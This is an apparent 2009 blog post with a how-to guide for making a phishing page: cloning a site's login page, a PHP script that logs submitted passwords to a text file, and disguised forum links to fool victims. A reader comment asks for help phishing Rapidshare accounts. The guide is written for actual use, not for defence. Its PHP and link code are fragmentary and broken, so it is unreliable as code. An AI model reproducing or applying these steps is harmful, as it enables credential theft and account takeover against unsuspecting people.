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"Worrying is like sitting in a rocking chair, you can rock all you want, but it doesn't get you anywhere."
- Landon Massel

User Request : Overview Of Phishing  

Posted by Hitesh

What is a phisher? - 101
Making a T35 Account - 102
Getting Web pages Source Code - 103
Creating Phish File - 104
How to fool people - 105
What is a phisher? 101

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

Making a T35 Account 102

In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish) For example: Most likeley, it is taken so add numbers like 08, or 07.

Getting Web Pages Source Code 103

After you create that page, go to the website you will make a phisher for, I will use KHI ( ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.

Creating Phish File 104

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

The is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

How to fool people - 105
What you do now is disguise your link. Use this code:

That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

[]*real website name*.com/login.php[/url]

You do the same for any forum!

Thank you for reading! Hope it helps! If i was missing something, or you have any questions, Mail me

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This entry was posted on Wednesday, September 09, 2009 and is filed under . You can leave a response and follow any responses to this entry through the Subscribe to: Post Comments (Atom) .


hii really thnxz yaar.....
well one qstn.. can i use site like 110mb..for free hosting....?
coz in t35 m not able 2 register it jsst redirect...from web2mail n other sites...?
n actlly i want to make.. phising file for rapidshare..
well i will try ur method.. n will post feedback 2moro....
sir can u give me any rapid a/c...?
well 2moro i willl post my feedback aftr trying..
n i don't kno mch more bout these al things..
well from where i can get template for my blog.. actlly i jst replace my myblog;s template n now m not able to post...
huh.... u can see my blog
or u can mail me also.......
ur blog is really awesm yaar..n i h've also told my frends tooo bout ur blog..

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